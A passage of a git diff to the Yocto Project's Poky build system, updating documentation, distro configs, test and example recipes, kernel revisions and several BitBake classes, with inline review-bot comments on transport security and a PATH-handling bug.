+ an existing image recipe. Create your own and do it right from the start.
+
+#. **Finally, here is a list of the basic skills you will need as a systems
+ developer. You must be able to:**
+
+ * deal with corporate proxies
+ * add a package to an image
+ * understand the difference between a recipe and package
+ * build a package by itself and why that's useful
+ * find out what packages are created by a recipe
+ * find out what files are in a package
+ * find out what files are in an image
+ * add an ssh server to an image (enable transferring of files to target)
+ * know the anatomy of a recipe
+ * know how to create and use layers
+ * find recipes (with the `OpenEmbedded Layer index <https://layers.openembedded.org>`_)
+ * understand difference between machine and distro settings
+ * find and use the right BSP (machine) for your hardware
+ * find examples of distro features and know where to set them
+ * understanding the task pipeline and executing individual tasks
+ * understand devtool and how it simplifies your workflow
+ * improve build speeds with shared downloads and shared state cache
+ * generate and understand a dependency graph
+ * generate and understand bitbake environment
+ * build an Extensible SDK for applications development
+
+#. **Depending on what you primary interests are with the Yocto Project, you
+ could consider any of the following reading:**
+
+ * **Look Through the Yocto Project Development Tasks Manual**: This manual
+ contains procedural information grouped to help you get set up, work with
+ layers, customize images, write new recipes, work with libraries, and use
+ QEMU. The information is task-based and spans the breadth of the Yocto
+ Project. See the :doc:`../dev-manual/dev-manual`.
+
+ * **Look Through the Yocto Project Application Development and the Extensible
+ Software Development Kit (eSDK) manual**: This manual describes how to use
+ both the standard SDK and the extensible SDK, which are used primarily for
+ application development. The :doc:`../sdk-manual/sdk-extensible` also provides
+ example workflows that use devtool. See the section
+ :ref:`sdk-manual/sdk-extensible:using \`\`devtool\`\` in your sdk workflow`
+ for more information.
+
+ * **Learn About Kernel Development**: If you want to see how to work with the
+ kernel and understand Yocto Linux kernels, see the :doc:`../kernel-dev/kernel-dev`.
+ This manual provides information on how to patch the kernel, modify kernel
+ recipes, and configure the kernel.
+
+ * **Learn About Board Support Packages (BSPs)**: If you want to learn about
+ BSPs, see the :doc:`../bsp-guide/bsp-guide`. This manual also provides an
+ example BSP creation workflow. See the :doc:`../bsp-guide/bsp` section.
+
+ * **Learn About Toaster**: Toaster is a web interface to the Yocto Project's
+ OpenEmbedded build system. If you are interested in using this type of
+ interface to create images, see the :doc:`../toaster-manual/toaster-manual`.
+
+ * **Have Available the Yocto Project Reference Manual**: Unlike the rest of
+ the Yocto Project manual set, this manual is comprised of material suited
+ for reference rather than procedures. You can get build details, a closer
+ look at how the pieces of the Yocto Project development environment work
+ together, information on various technical details, guidance on migrating
+ to a newer Yocto Project release, reference material on the directory
+ structure, classes, and tasks. The :doc:`../ref-manual/ref-manual` also
+ contains a fairly comprehensive glossary of variables used within the Yocto
+ Project.
+
+.. include:: /boilerplate.rst
diff --git a/meta-poky/conf/distro/poky-tiny.conf b/meta-poky/conf/distro/poky-tiny.conf
index c6d4b88f83..f20cd4ced2 100644
--- a/meta-poky/conf/distro/poky-tiny.conf
+++ b/meta-poky/conf/distro/poky-tiny.conf
@@ -38,7 +38,7 @@ TCLIBC = "musl"
# Distro config is evaluated after the machine config, so we have to explicitly
# set the kernel provider to override a machine config.
PREFERRED_PROVIDER_virtual/kernel = "linux-yocto-tiny"
-PREFERRED_VERSION_linux-yocto-tiny ?= "5.0%"
+PREFERRED_VERSION_linux-yocto-tiny ?= "5.4%"
# We can use packagegroup-core-boot, but in the future we may need a new packagegroup-core-tiny
#POKY_DEFAULT_EXTRA_RDEPENDS += "packagegroup-core-boot"
diff --git a/meta-poky/conf/distro/poky.conf b/meta-poky/conf/distro/poky.conf
index 1c3c28438b..25b0c8e608 100644
--- a/meta-poky/conf/distro/poky.conf
+++ b/meta-poky/conf/distro/poky.conf
@@ -1,6 +1,6 @@
DISTRO = "poky"
DISTRO_NAME = "Poky (Yocto Project Reference Distro)"
-DISTRO_VERSION = "3.1.4"
+DISTRO_VERSION = "3.1.33"
DISTRO_CODENAME = "dunfell"
SDK_VENDOR = "-pokysdk"
SDK_VERSION = "${@d.getVar('DISTRO_VERSION').replace('snapshot-${DATE}', 'snapshot')}"
@@ -24,7 +24,7 @@ DISTRO_FEATURES ?= "${DISTRO_FEATURES_DEFAULT} ${POKY_DEFAULT_DISTRO_FEATURES}"
PREFERRED_VERSION_linux-yocto ?= "5.4%"
SDK_NAME = "${DISTRO}-${TCLIBC}-${SDKMACHINE}-${IMAGE_BASENAME}-${TUNE_PKGARCH}-${MACHINE}"
-SDKPATH = "/opt/${DISTRO}/${SDK_VERSION}"
+SDKPATHINSTALL = "/opt/${DISTRO}/${SDK_VERSION}"
DISTRO_EXTRA_RDEPENDS += " ${POKY_DEFAULT_EXTRA_RDEPENDS}"
DISTRO_EXTRA_RRECOMMENDS += " ${POKY_DEFAULT_EXTRA_RRECOMMENDS}"
@@ -39,42 +39,18 @@ DISTRO_EXTRA_RDEPENDS_append_qemux86-64 = " ${POKYQEMUDEPS}"
TCLIBCAPPEND = ""
-PREMIRRORS ??= "\
-bzr://.*/.* http://downloads.yoctoproject.org/mirror/sources/ \n \
-cvs://.*/.* http://downloads.yoctoproject.org/mirror/sources/ \n \
-git://.*/.* http://downloads.yoctoproject.org/mirror/sources/ \n \
-gitsm://.*/.* http://downloads.yoctoproject.org/mirror/sources/ \n \
-hg://.*/.* http://downloads.yoctoproject.org/mirror/sources/ \n \
-osc://.*/.* http://downloads.yoctoproject.org/mirror/sources/ \n \
-p4://.*/.* http://downloads.yoctoproject.org/mirror/sources/ \n \
-svn://.*/.* http://downloads.yoctoproject.org/mirror/sources/ \n"
-
SANITY_TESTED_DISTROS ?= " \
poky-2.7 \n \
poky-3.0 \n \
poky-3.1 \n \
- ubuntu-16.04 \n \
ubuntu-18.04 \n \
- ubuntu-19.04 \n \
ubuntu-20.04 \n \
- fedora-30 \n \
- fedora-31 \n \
- fedora-32 \n \
- centos-7 \n \
- centos-8 \n \
- debian-8 \n \
- debian-9 \n \
- debian-10 \n \
- opensuseleap-15.1 \n \
+ ubuntu-22.04 \n \
+ fedora-37 \n \
+ debian-11 \n \
+ opensuseleap-15.3 \n \
+ almalinux-8.8 \n \
"
-#
-# OELAYOUT_ABI allows us to notify users when the format of TMPDIR changes in
-# an incompatible way. Such changes should usually be detailed in the commit
-# that breaks the format and have been previously discussed on the mailing list
-# with general agreement from the core team.
-#
-OELAYOUT_ABI = "12"
-
# add poky sanity bbclass
INHERIT += "poky-sanity"
diff --git a/meta-poky/conf/local.conf.sample b/meta-poky/conf/local.conf.sample
index b555f1d21e..ea37a801aa 100644
--- a/meta-poky/conf/local.conf.sample
+++ b/meta-poky/conf/local.conf.sample
@@ -231,7 +231,7 @@ BB_DISKMON_DIRS ??= "\
# present in the cache. It assumes you can download something faster than you can build it
# which will depend on your network.
#
-#SSTATE_MIRRORS ?= "file://.* http://sstate.yoctoproject.org/2.5/PATH;downloadfilename=PATH"
+#SSTATE_MIRRORS ?= "file://.* http://sstate.yoctoproject.org/all/PATH;downloadfilename=PATH"
#
# Qemu configuration
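Review bot: The sample `SSTATE_MIRRORS` line still uses a cleartext `http://` URL, and shared-state objects are prebuilt outputs that are unpacked straight into the build, so anyone who uncomments it pulls them with no transport integrity. If the mirror serves TLS (to be confirmed), the sample would be better as `#SSTATE_MIRRORS ?= "file://.* https://sstate.yoctoproject.org/all/PATH;downloadfilename=PATH"`. A one-line comment beside it pointing at sstate signature checking (`SSTATE_VERIFY_SIG`) would also help users who enable a remote mirror.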
diff --git a/meta-poky/conf/local.conf.sample.extended b/meta-poky/conf/local.conf.sample.extended
index dc92a16f6c..9e857360ae 100644
--- a/meta-poky/conf/local.conf.sample.extended
+++ b/meta-poky/conf/local.conf.sample.extended
@@ -328,7 +328,7 @@ DISTRO_FEATURES_remove = "x11"
# The INITRAMFS_IMAGE image variable will cause an additional recipe to
# be built as a dependency to the what ever rootfs recipe you might be
# using such as core-image-sato. The initramfs might be needed for
-# the initial boot of of the target system such as to load kernel
+# the initial boot of the target system such as to load kernel
# modules prior to mounting the root file system.
#
# INITRAMFS_IMAGE_BUNDLE variable controls if the image recipe
@@ -368,20 +368,9 @@ DISTRO_FEATURES_remove = "x11"
#
#
-# Use busybox/mdev for system initialization
+# System initialization
#
-#VIRTUAL-RUNTIME_dev_manager = "busybox-mdev"
-#VIRTUAL-RUNTIME_login_manager = "busybox"
-#VIRTUAL-RUNTIME_init_manager = "busybox"
-#VIRTUAL-RUNTIME_initscripts = "initscripts"
-#VIRTUAL-RUNTIME_keymaps = "keymaps"
-#DISTRO_FEATURES_BACKFILL_CONSIDERED += "sysvinit"
-
-#
-# Use systemd for system initialization
-#
-#DISTRO_FEATURES_append = " systemd"
-#DISTRO_FEATURES_BACKFILL_CONSIDERED += "sysvinit"
-#VIRTUAL-RUNTIME_login_manager = "shadow-base"
-#VIRTUAL-RUNTIME_init_manager = "systemd"
-#VIRTUAL-RUNTIME_initscripts = "systemd-compat-units"
+#INIT_MANAGER = "none"
+#INIT_MANAGER = "sysvinit"
+#INIT_MANAGER = "systemd"
+#INIT_MANAGER = "mdev-busybox"
diff --git a/meta-selftest/lib/pseudo_pyc_test1.py b/meta-selftest/lib/pseudo_pyc_test1.py
new file mode 100644
index 0000000000..b59abdd536
--- /dev/null
+++ b/meta-selftest/lib/pseudo_pyc_test1.py
@@ -0,0 +1 @@
+STRING = "pseudo_pyc_test1"
diff --git a/meta-selftest/lib/pseudo_pyc_test2.py b/meta-selftest/lib/pseudo_pyc_test2.py
new file mode 100644
index 0000000000..fb67a978e0
--- /dev/null
+++ b/meta-selftest/lib/pseudo_pyc_test2.py
@@ -0,0 +1 @@
+STRING = "pseudo_pyc_test2"
diff --git a/meta-selftest/recipes-test/aspell/aspell_0.0.0.1.bb b/meta-selftest/recipes-test/aspell/aspell_0.0.0.1.bb
index 9f905a5198..dcf6c8ba63 100644
--- a/meta-selftest/recipes-test/aspell/aspell_0.0.0.1.bb
+++ b/meta-selftest/recipes-test/aspell/aspell_0.0.0.1.bb
@@ -4,6 +4,7 @@
SUMMARY = "GNU Aspell spell-checker"
SECTION = "console/utils"
+HOMEPAGE = "https://ftp.gnu.org/gnu/aspell/"
LICENSE = "LGPLv2 | LGPLv2.1"
LIC_FILES_CHKSUM = "file://COPYING;md5=7fbc338309ac38fefcd64b04bb903e34"
diff --git a/meta-selftest/recipes-test/devtool/devtool-upgrade-test2_git.bb b/meta-selftest/recipes-test/devtool/devtool-upgrade-test2_git.bb
index 07b83276fb..8a27e3a791 100644
--- a/meta-selftest/recipes-test/devtool/devtool-upgrade-test2_git.bb
+++ b/meta-selftest/recipes-test/devtool/devtool-upgrade-test2_git.bb
@@ -11,7 +11,7 @@ SRCREV = "1a3e1343761b30750bed70e0fd688f6d3c7b3717"
PV = "0.1+git${SRCPV}"
PR = "r2"
-SRC_URI = "git://git.yoctoproject.org/dbus-wait"
+SRC_URI = "git://git.yoctoproject.org/dbus-wait;branch=master"
UPSTREAM_CHECK_COMMITS = "1"
RECIPE_NO_UPDATE_REASON = "This recipe is used to test devtool upgrade feature"
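Review bot: The updated `SRC_URI` names the branch but still fetches over the unauthenticated `git://` transport. The pinned `SRCREV` limits what a tampered transfer could substitute, but the fetch is still unprotected on the wire and fails on networks that block port 9418. If the server offers HTTPS for this repository (to be confirmed), `SRC_URI = "git://git.yoctoproject.org/dbus-wait;branch=master;protocol=https"` would be preferable. The same line in `devtool-upgrade-test2_git.bb.upgraded` has the same issue.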
diff --git a/meta-selftest/recipes-test/devtool/devtool-upgrade-test2_git.bb.upgraded b/meta-selftest/recipes-test/devtool/devtool-upgrade-test2_git.bb.upgraded
index 32ec4b14fa..fbe90d6c6b 100644
--- a/meta-selftest/recipes-test/devtool/devtool-upgrade-test2_git.bb.upgraded
+++ b/meta-selftest/recipes-test/devtool/devtool-upgrade-test2_git.bb.upgraded
@@ -10,7 +10,7 @@ DEPENDS = "dbus"
SRCREV = "6cc6077a36fe2648a5f993fe7c16c9632f946517"
PV = "0.1+git${SRCPV}"
-SRC_URI = "git://git.yoctoproject.org/dbus-wait"
+SRC_URI = "git://git.yoctoproject.org/dbus-wait;branch=master"
UPSTREAM_CHECK_COMMITS = "1"
RECIPE_NO_UPDATE_REASON = "This recipe is used to test devtool upgrade feature"
diff --git a/meta-selftest/recipes-test/images/oe-selftest-image.bb b/meta-selftest/recipes-test/images/oe-selftest-image.bb
index 5d4d10eef6..6246aae910 100644
--- a/meta-selftest/recipes-test/images/oe-selftest-image.bb
+++ b/meta-selftest/recipes-test/images/oe-selftest-image.bb
@@ -1,6 +1,6 @@
SUMMARY = "An image used during oe-selftest tests"
-IMAGE_INSTALL = "packagegroup-core-boot dropbear"
+IMAGE_INSTALL = "packagegroup-core-boot packagegroup-core-ssh-dropbear"
IMAGE_FEATURES = "debug-tweaks"
IMAGE_LINGUAS = " "
diff --git a/meta-selftest/recipes-test/images/wic-image-minimal.bb b/meta-selftest/recipes-test/images/wic-image-minimal.bb
index e1da203b59..1cb019898d 100644
--- a/meta-selftest/recipes-test/images/wic-image-minimal.bb
+++ b/meta-selftest/recipes-test/images/wic-image-minimal.bb
@@ -6,7 +6,10 @@ IMAGE_INSTALL = "packagegroup-core-boot"
IMAGE_FSTYPES = "wic"
-WKS_FILE_DEPENDS = "syslinux syslinux-native dosfstools-native mtools-native gptfdisk-native"
+WKS_FILE_DEPENDS = "dosfstools-native mtools-native gptfdisk-native"
+WKS_FILE_DEPENDS_append_x86 = " syslinux-native syslinux"
+WKS_FILE_DEPENDS_append_x86-64 = " syslinux-native syslinux"
+WKS_FILE_DEPENDS_append_x86-x32 = " syslinux-native syslinux"
LIC_FILES_CHKSUM = "file://${COREBASE}/meta/COPYING.MIT;md5=3da9cfbcb788c80a0384361b4de20420"
diff --git a/meta-selftest/recipes-test/pseudo-pyc-test/pseudo-pyc-test.bb b/meta-selftest/recipes-test/pseudo-pyc-test/pseudo-pyc-test.bb
new file mode 100644
index 0000000000..12dc91a8f3
--- /dev/null
+++ b/meta-selftest/recipes-test/pseudo-pyc-test/pseudo-pyc-test.bb
@@ -0,0 +1,15 @@
+SUMMARY = "pseudo env test"
+LICENSE = "MIT"
+LIC_FILES_CHKSUM = "file://${COREBASE}/meta/COPYING.MIT;md5=3da9cfbcb788c80a0384361b4de20420"
+
+INHIBIT_DEFAULT_DEPS = "1"
+
+python do_compile() {
+ import pseudo_pyc_test1
+ print(pseudo_pyc_test1.STRING)
+}
+
+python do_install() {
+ import pseudo_pyc_test2
+ print(pseudo_pyc_test2.STRING)
+}
diff --git a/meta-selftest/recipes-test/recipeutils/recipeutils-test_1.2.bb b/meta-selftest/recipes-test/recipeutils/recipeutils-test_1.2.bb
index 0cd0494da8..fd113b5ec5 100644
--- a/meta-selftest/recipes-test/recipeutils/recipeutils-test_1.2.bb
+++ b/meta-selftest/recipes-test/recipeutils/recipeutils-test_1.2.bb
@@ -2,7 +2,7 @@ SUMMARY = "Test recipe for recipeutils.patch_recipe()"
require recipeutils-test.inc
-LICENSE = "Proprietary"
+LICENSE = "HPND"
LIC_FILES_CHKSUM = "file://${WORKDIR}/somefile;md5=d41d8cd98f00b204e9800998ecf8427e"
DEPENDS += "zlib"
diff --git a/meta-skeleton/recipes-baremetal/baremetal-examples/baremetal-helloworld_git.bb b/meta-skeleton/recipes-baremetal/baremetal-examples/baremetal-helloworld_git.bb
index d8633702fc..8db57f202e 100644
--- a/meta-skeleton/recipes-baremetal/baremetal-examples/baremetal-helloworld_git.bb
+++ b/meta-skeleton/recipes-baremetal/baremetal-examples/baremetal-helloworld_git.bb
@@ -1,5 +1,6 @@
SUMMARY = "Baremetal examples to work with the several QEMU architectures supported on OpenEmbedded"
HOMEPAGE = "https://github.com/aehs29/baremetal-helloqemu"
+DESCRIPTION = "These are introductory examples to showcase the use of QEMU to run baremetal applications."
LICENSE = "MIT"
LIC_FILES_CHKSUM = "file://LICENSE;md5=39346640a23c701e4f459e05f56f4449"
diff --git a/meta-skeleton/recipes-kernel/hello-mod/hello-mod_0.1.bb b/meta-skeleton/recipes-kernel/hello-mod/hello-mod_0.1.bb
index 3d33446500..bc9acccd5f 100644
--- a/meta-skeleton/recipes-kernel/hello-mod/hello-mod_0.1.bb
+++ b/meta-skeleton/recipes-kernel/hello-mod/hello-mod_0.1.bb
@@ -1,4 +1,5 @@
SUMMARY = "Example of how to build an external Linux kernel module"
+DESCRIPTION = "${SUMMARY}"
LICENSE = "GPLv2"
LIC_FILES_CHKSUM = "file://COPYING;md5=12f884d2ae1ff87c09e5b7ccc2c4ca7e"
diff --git a/meta-skeleton/recipes-kernel/linux/linux-yocto-custom.bb b/meta-skeleton/recipes-kernel/linux/linux-yocto-custom.bb
index 6194d4f8da..d53f9c7a40 100644
--- a/meta-skeleton/recipes-kernel/linux/linux-yocto-custom.bb
+++ b/meta-skeleton/recipes-kernel/linux/linux-yocto-custom.bb
@@ -1,6 +1,6 @@
+SUMMARY = "An example kernel recipe that uses the linux-yocto and oe-core"
# linux-yocto-custom.bb:
#
-# An example kernel recipe that uses the linux-yocto and oe-core
# kernel classes to apply a subset of yocto kernel management to git
# managed kernel repositories.
#
diff --git a/meta-skeleton/recipes-multilib/images/core-image-multilib-example.bb b/meta-skeleton/recipes-multilib/images/core-image-multilib-example.bb
index f13186f933..e7d50aefda 100644
--- a/meta-skeleton/recipes-multilib/images/core-image-multilib-example.bb
+++ b/meta-skeleton/recipes-multilib/images/core-image-multilib-example.bb
@@ -1,5 +1,4 @@
-#
-# An example of a multilib image
+SUMMARY = "An example of a multilib image"
#
# This example includes a lib32 version of bash into an otherwise standard
# sato image. It assumes a "lib32" multilib has been enabled in the user's
diff --git a/meta-skeleton/recipes-skeleton/service/service_0.1.bb b/meta-skeleton/recipes-skeleton/service/service_0.1.bb
index 6416618dcb..669d173ad1 100644
--- a/meta-skeleton/recipes-skeleton/service/service_0.1.bb
+++ b/meta-skeleton/recipes-skeleton/service/service_0.1.bb
@@ -1,5 +1,6 @@
SUMMARY = "The canonical example of init scripts"
SECTION = "base"
+DESCRIPTION = "This recipe is a canonical example of init scripts"
LICENSE = "GPLv2"
LIC_FILES_CHKSUM = "file://${WORKDIR}/COPYRIGHT;md5=349c872e0066155e1818b786938876a4"
diff --git a/meta-yocto-bsp/recipes-kernel/linux/linux-yocto_5.4.bbappend b/meta-yocto-bsp/recipes-kernel/linux/linux-yocto_5.4.bbappend
index 9c37f91bc1..fbe039aa95 100644
--- a/meta-yocto-bsp/recipes-kernel/linux/linux-yocto_5.4.bbappend
+++ b/meta-yocto-bsp/recipes-kernel/linux/linux-yocto_5.4.bbappend
@@ -7,8 +7,8 @@ KMACHINE_genericx86 ?= "common-pc"
KMACHINE_genericx86-64 ?= "common-pc-64"
KMACHINE_beaglebone-yocto ?= "beaglebone"
-SRCREV_machine_genericx86 ?= "706efec4c1e270ec5dda92275898cd465dfdc7dd"
-SRCREV_machine_genericx86-64 ?= "706efec4c1e270ec5dda92275898cd465dfdc7dd"
+SRCREV_machine_genericx86 ?= "35826e154ee014b64ccfa0d1f12d36b8f8a75939"
+SRCREV_machine_genericx86-64 ?= "35826e154ee014b64ccfa0d1f12d36b8f8a75939"
SRCREV_machine_edgerouter ?= "706efec4c1e270ec5dda92275898cd465dfdc7dd"
SRCREV_machine_beaglebone-yocto ?= "706efec4c1e270ec5dda92275898cd465dfdc7dd"
@@ -17,7 +17,7 @@ COMPATIBLE_MACHINE_genericx86-64 = "genericx86-64"
COMPATIBLE_MACHINE_edgerouter = "edgerouter"
COMPATIBLE_MACHINE_beaglebone-yocto = "beaglebone-yocto"
-LINUX_VERSION_genericx86 = "5.4.58"
-LINUX_VERSION_genericx86-64 = "5.4.58"
+LINUX_VERSION_genericx86 = "5.4.219"
+LINUX_VERSION_genericx86-64 = "5.4.219"
LINUX_VERSION_edgerouter = "5.4.58"
LINUX_VERSION_beaglebone-yocto = "5.4.58"
diff --git a/meta/classes/archiver.bbclass b/meta/classes/archiver.bbclass
index 1a3c190604..6ead010fe1 100644
--- a/meta/classes/archiver.bbclass
+++ b/meta/classes/archiver.bbclass
@@ -53,10 +53,11 @@ ARCHIVER_MODE[recipe] ?= "0"
ARCHIVER_MODE[mirror] ?= "split"
DEPLOY_DIR_SRC ?= "${DEPLOY_DIR}/sources"
-ARCHIVER_TOPDIR ?= "${WORKDIR}/deploy-sources"
-ARCHIVER_OUTDIR = "${ARCHIVER_TOPDIR}/${TARGET_SYS}/${PF}/"
+ARCHIVER_TOPDIR ?= "${WORKDIR}/archiver-sources"
+ARCHIVER_ARCH = "${TARGET_SYS}"
+ARCHIVER_OUTDIR = "${ARCHIVER_TOPDIR}/${ARCHIVER_ARCH}/${PF}/"
ARCHIVER_RPMTOPDIR ?= "${WORKDIR}/deploy-sources-rpm"
-ARCHIVER_RPMOUTDIR = "${ARCHIVER_RPMTOPDIR}/${TARGET_SYS}/${PF}/"
+ARCHIVER_RPMOUTDIR = "${ARCHIVER_RPMTOPDIR}/${ARCHIVER_ARCH}/${PF}/"
ARCHIVER_WORKDIR = "${WORKDIR}/archiver-work/"
# When producing a combined mirror directory, allow duplicates for the case
@@ -100,6 +101,10 @@ python () {
bb.debug(1, 'archiver: %s is excluded, covered by gcc-source' % pn)
return
+ # TARGET_SYS in ARCHIVER_ARCH will break the stamp for gcc-source in multiconfig
+ if pn.startswith('gcc-source'):
+ d.setVar('ARCHIVER_ARCH', "allarch")
+
def hasTask(task):
return bool(d.getVarFlag(task, "task", False)) and not bool(d.getVarFlag(task, "noexec", False))
@@ -281,7 +286,10 @@ python do_ar_configured() {
# ${STAGING_DATADIR}/aclocal/libtool.m4, so we can't re-run the
# do_configure, we archive the already configured ${S} to
# instead of.
- elif pn != 'libtool-native':
+ # The kernel class functions require it to be on work-shared, we
+ # don't unpack, patch, configure again, just archive the already
+ # configured ${S}
+ elif not (pn == 'libtool-native' or is_work_shared(d)):
def runTask(task):
prefuncs = d.getVarFlag(task, 'prefuncs') or ''
for func in prefuncs.split():
@@ -484,6 +492,9 @@ python do_unpack_and_patch() {
src_orig = '%s.orig' % src
oe.path.copytree(src, src_orig)
+ if bb.data.inherits_class('dos2unix', d):
+ bb.build.exec_func('do_convert_crlf_to_lf', d)
+
# Make sure gcc and kernel sources are patched only once
if not (d.getVar('SRC_URI') == "" or is_work_shared(d)):
bb.build.exec_func('do_patch', d)
@@ -572,7 +583,7 @@ python do_dumpdata () {
SSTATETASKS += "do_deploy_archives"
do_deploy_archives () {
- echo "Deploying source archive files from ${ARCHIVER_TOPDIR} to ${DEPLOY_DIR_SRC}."
+ bbnote "Deploying source archive files from ${ARCHIVER_TOPDIR} to ${DEPLOY_DIR_SRC}."
}
python do_deploy_archives_setscene () {
sstate_setscene(d)
@@ -591,6 +602,7 @@ addtask do_dumpdata
addtask do_ar_recipe
addtask do_deploy_archives
do_build[recrdeptask] += "do_deploy_archives"
+do_rootfs[recrdeptask] += "do_deploy_archives"
do_populate_sdk[recrdeptask] += "do_deploy_archives"
python () {
diff --git a/meta/classes/base.bbclass b/meta/classes/base.bbclass
index 7aa2e144eb..3cae577a0e 100644
--- a/meta/classes/base.bbclass
+++ b/meta/classes/base.bbclass
@@ -122,6 +122,10 @@ def setup_hosttools_dir(dest, toolsvar, d, fatal=True):
tools = d.getVar(toolsvar).split()
origbbenv = d.getVar("BB_ORIGENV", False)
path = origbbenv.getVar("PATH")
+ # Need to ignore our own scripts directories to avoid circular links
+ for p in path.split(":"):
+ if p.endswith("/scripts"):
+ path = path.replace(p, "/ignoreme")
bb.utils.mkdirhier(dest)
notfound = []
for tool in tools:
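Review bot: The added loop edits `path` with `path.replace(p, "/ignoreme")`, which is a substring replace over the whole PATH string rather than a per-entry one. An entry such as `<dir>/scripts` therefore also rewrites the start of any other entry that merely contains that text (a constructed example: `<dir>/scripts-extra` becomes `/ignoreme-extra`), so host tools could resolve from an unintended location or not at all. The `endswith("/scripts")` test also matches any directory called `scripts`, not only the build system's own ones that the comment refers to. Rebuilding the list entry by entry avoids the first problem: `path = ":".join("/ignoreme" if p.endswith("/scripts") else p for p in path.split(":"))`. `setup_hosttools_dir` starts and ends outside this hunk.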
@@ -135,7 +139,7 @@ def setup_hosttools_dir(dest, toolsvar, d, fatal=True):
# /usr/local/bin/ccache/gcc -> /usr/bin/ccache, then which(gcc)
# would return /usr/local/bin/ccache/gcc, but what we need is
# /usr/bin/gcc, this code can check and fix that.
- if "ccache" in srctool:
+ if os.path.islink(srctool) and os.path.basename(os.readlink(srctool)) == 'ccache':
srctool = bb.utils.which(path, tool, executable=True, direction=1)
if srctool:
os.symlink(srctool, desttool)
@@ -153,14 +157,14 @@ do_fetch[vardeps] += "SRCREV"
python base_do_fetch() {
src_uri = (d.getVar('SRC_URI') or "").split()
- if len(src_uri) == 0:
+ if not src_uri:
return
try:
fetcher = bb.fetch2.Fetch(src_uri, d)
fetcher.download()
except bb.fetch2.BBFetchException as e:
- bb.fatal(str(e))
+ bb.fatal("Bitbake Fetcher Error: " + repr(e))
}
addtask unpack after do_fetch
@@ -170,14 +174,14 @@ do_unpack[cleandirs] = "${@d.getVar('S') if os.path.normpath(d.getVar('S')) != o
python base_do_unpack() {
src_uri = (d.getVar('SRC_URI') or "").split()
- if len(src_uri) == 0:
+ if not src_uri:
return
try:
fetcher = bb.fetch2.Fetch(src_uri, d)
fetcher.unpack(d.getVar('WORKDIR'))
except bb.fetch2.BBFetchException as e:
- bb.fatal(str(e))
+ bb.fatal("Bitbake Fetcher Error: " + repr(e))
}
def get_layers_branch_rev(d):
@@ -231,6 +235,7 @@ python base_eventhandler() {
if isinstance(e, bb.event.ConfigParsed):
if not d.getVar("NATIVELSBSTRING", False):
d.setVar("NATIVELSBSTRING", lsb_distro_identifier(d))
+ d.setVar("ORIGNATIVELSBSTRING", d.getVar("NATIVELSBSTRING", False))
d.setVar('BB_VERSION', bb.__version__)
# There might be no bb.event.ConfigParsed event if bitbake server is
@@ -388,6 +393,11 @@ python () {
oe.utils.features_backfill("DISTRO_FEATURES", d)
oe.utils.features_backfill("MACHINE_FEATURES", d)
+ if os.path.normpath(d.getVar("WORKDIR")) != os.path.normpath(d.getVar("S")):
+ d.appendVar("PSEUDO_IGNORE_PATHS", ",${S}")
+ if os.path.normpath(d.getVar("WORKDIR")) != os.path.normpath(d.getVar("B")):
+ d.appendVar("PSEUDO_IGNORE_PATHS", ",${B}")
+
# Handle PACKAGECONFIG
#
# These take the form:
@@ -682,7 +692,7 @@ python () {
if os.path.basename(p) == machine and os.path.isdir(p):
paths.append(p)
- if len(paths) != 0:
+ if paths:
for s in srcuri.split():
if not s.startswith("file://"):
continue
@@ -715,7 +725,7 @@ do_cleansstate[nostamp] = "1"
python do_cleanall() {
src_uri = (d.getVar('SRC_URI') or "").split()
- if len(src_uri) == 0:
+ if not src_uri:
return
try:
diff --git a/meta/classes/bin_package.bbclass b/meta/classes/bin_package.bbclass
index cbc9b1fa13..c1954243ee 100644
--- a/meta/classes/bin_package.bbclass
+++ b/meta/classes/bin_package.bbclass
@@ -30,8 +30,9 @@ bin_package_do_install () {
bbfatal bin_package has nothing to install. Be sure the SRC_URI unpacks into S.
fi
cd ${S}
+ install -d ${D}${base_prefix}
tar --no-same-owner --exclude='./patches' --exclude='./.pc' -cpf - . \
- | tar --no-same-owner -xpf - -C ${D}
+ | tar --no-same-owner -xpf - -C ${D}${base_prefix}
}
FILES_${PN} = "/"
diff --git a/meta/classes/buildhistory.bbclass b/meta/classes/buildhistory.bbclass
index 156324d339..6a1a20653a 100644
--- a/meta/classes/buildhistory.bbclass
+++ b/meta/classes/buildhistory.bbclass
@@ -671,13 +671,16 @@ IMAGE_POSTPROCESS_COMMAND[vardepsexclude] += "buildhistory_get_imageinfo"
POPULATE_SDK_POST_TARGET_COMMAND_append = " buildhistory_list_installed_sdk_target;"
POPULATE_SDK_POST_TARGET_COMMAND_append = " buildhistory_get_sdk_installed_target;"
POPULATE_SDK_POST_TARGET_COMMAND[vardepvalueexclude] .= "| buildhistory_list_installed_sdk_target;| buildhistory_get_sdk_installed_target;"
+POPULATE_SDK_POST_TARGET_COMMAND[vardepsexclude] += "buildhistory_list_installed_sdk_target buildhistory_get_sdk_installed_target"
POPULATE_SDK_POST_HOST_COMMAND_append = " buildhistory_list_installed_sdk_host;"
POPULATE_SDK_POST_HOST_COMMAND_append = " buildhistory_get_sdk_installed_host;"
POPULATE_SDK_POST_HOST_COMMAND[vardepvalueexclude] .= "| buildhistory_list_installed_sdk_host;| buildhistory_get_sdk_installed_host;"
+POPULATE_SDK_POST_HOST_COMMAND[vardepsexclude] += "buildhistory_list_installed_sdk_host buildhistory_get_sdk_installed_host"
SDK_POSTPROCESS_COMMAND_append = " buildhistory_get_sdkinfo ; buildhistory_get_extra_sdkinfo; "
SDK_POSTPROCESS_COMMAND[vardepvalueexclude] .= "| buildhistory_get_sdkinfo ; buildhistory_get_extra_sdkinfo; "
+SDK_POSTPROCESS_COMMAND[vardepsexclude] += "buildhistory_get_sdkinfo buildhistory_get_extra_sdkinfo"
python buildhistory_write_sigs() {
if not "task" in (d.getVar('BUILDHISTORY_FEATURES') or "").split():
@@ -852,7 +855,7 @@ END
}
python buildhistory_eventhandler() {
- if e.data.getVar('BUILDHISTORY_FEATURES').strip():
+ if (e.data.getVar('BUILDHISTORY_FEATURES') or "").strip():
reset = e.data.getVar("BUILDHISTORY_RESET")
olddir = e.data.getVar("BUILDHISTORY_OLD_DIR")
if isinstance(e, bb.event.BuildStarted):
@@ -862,6 +865,7 @@ python buildhistory_eventhandler() {
if os.path.isdir(olddir):
shutil.rmtree(olddir)
rootdir = e.data.getVar("BUILDHISTORY_DIR")
+ bb.utils.mkdirhier(rootdir)
entries = [ x for x in os.listdir(rootdir) if not x.startswith('.') ]
bb.utils.mkdirhier(olddir)
for entry in entries:
@@ -950,23 +954,19 @@ def write_latest_srcrev(d, pkghistdir):
value = value.replace('"', '').strip()
old_tag_srcrevs[key] = value
